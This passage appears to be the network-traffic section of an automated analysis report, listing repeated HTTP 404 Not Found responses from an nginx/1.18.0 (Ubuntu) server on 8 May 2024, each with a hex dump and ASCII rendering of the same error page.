Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 08 May 2024 13:23:26 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not 
Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found; Server: nginx/1.18.0 (Ubuntu); Date: Wed, 08 May 2024 13:23:29 GMT; Content-Type: text/html; Content-Length: 564; Connection: keep-alive; Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a; Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found; Server: nginx/1.18.0 (Ubuntu); Date: Wed, 08 May 2024 13:23:31 GMT; Content-Type: text/html; Content-Length: 564; Connection: keep-alive; Data Raw: same 564-byte body as the entry above; Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found; Server: nginx/1.18.0 (Ubuntu); Date: Wed, 08 May 2024 13:23:50 GMT; Content-Type: text/html; Content-Length: 564; Connection: keep-alive; Data Raw: same 564-byte body as the entry above; Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found; Server: nginx/1.18.0 (Ubuntu); Date: Wed, 08 May 2024 13:23:53 GMT; Content-Type: text/html; Content-Length: 564; Connection: keep-alive; Data Raw: same 564-byte body as the entry above; Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found; Server: nginx/1.18.0 (Ubuntu); Date: Wed, 08 May 2024 13:23:55 GMT; Content-Type: text/html; Content-Length: 564; Connection: keep-alive; Data Raw: same 564-byte body as the entry above; Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found; Server: nginx/1.18.0 (Ubuntu); Date: Wed, 08 May 2024 13:24:28 GMT; Content-Type: text/html; Content-Length: 564; Connection: keep-alive; Data Raw: same 564-byte body as the entry above; Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found; Server: nginx/1.18.0 (Ubuntu); Date: Wed, 08 May 2024 13:24:30 GMT; Content-Type: text/html; Content-Length: 564; Connection: keep-alive; Data Raw: same 564-byte body as the entry above; Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found; Server: nginx/1.18.0 (Ubuntu); Date: Wed, 08 May 2024 13:24:31 GMT; Content-Type: text/html; Content-Length: 564; Connection: keep-alive; Data Raw: same 564-byte body as the entry above; Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found; Server: nginx/1.18.0 (Ubuntu); Date: Wed, 08 May 2024 13:24:32 GMT; Content-Type: text/html; Content-Length: 564; Connection: keep-alive; Data Raw: same 564-byte body as the entry above; Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found; Server: nginx/1.18.0 (Ubuntu); Date: Wed, 08 May 2024 13:24:34 GMT; Content-Type: text/html; Content-Length: 564; Connection: keep-alive; Data Raw: same 564-byte body as the entry above; Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found; Server: nginx/1.18.0 (Ubuntu); Date: Wed, 08 May 2024 13:24:36 GMT; Content-Type: text/html; Content-Length: 564; Connection: keep-alive; Data Raw: same 564-byte body as the entry above; Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found; Server: nginx/1.18.0 (Ubuntu); Date: Wed, 08 May 2024 13:24:39 GMT; Content-Type: text/html; Content-Length: 564; Connection: keep-alive; Data Raw: same 564-byte body as the entry above; Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found; Server: nginx/1.18.0 (Ubuntu); Date: Wed, 08 May 2024 13:24:42 GMT; Content-Type: text/html; Content-Length: 564; Connection: keep-alive; Data Raw: same 564-byte body as the entry above; Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found; Server: nginx/1.18.0 (Ubuntu); Date: Wed, 08 May 2024 13:24:45 GMT; Content-Type: text/html; Content-Length: 564; Connection: keep-alive; Data Raw: same 564-byte body as the entry above; Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 08 May 2024 13:25:06 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not 
Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 08 May 2024 13:25:08 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not 
Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 08 May 2024 13:25:11 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not 
Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 08 May 2024 13:25:43 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not 
Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
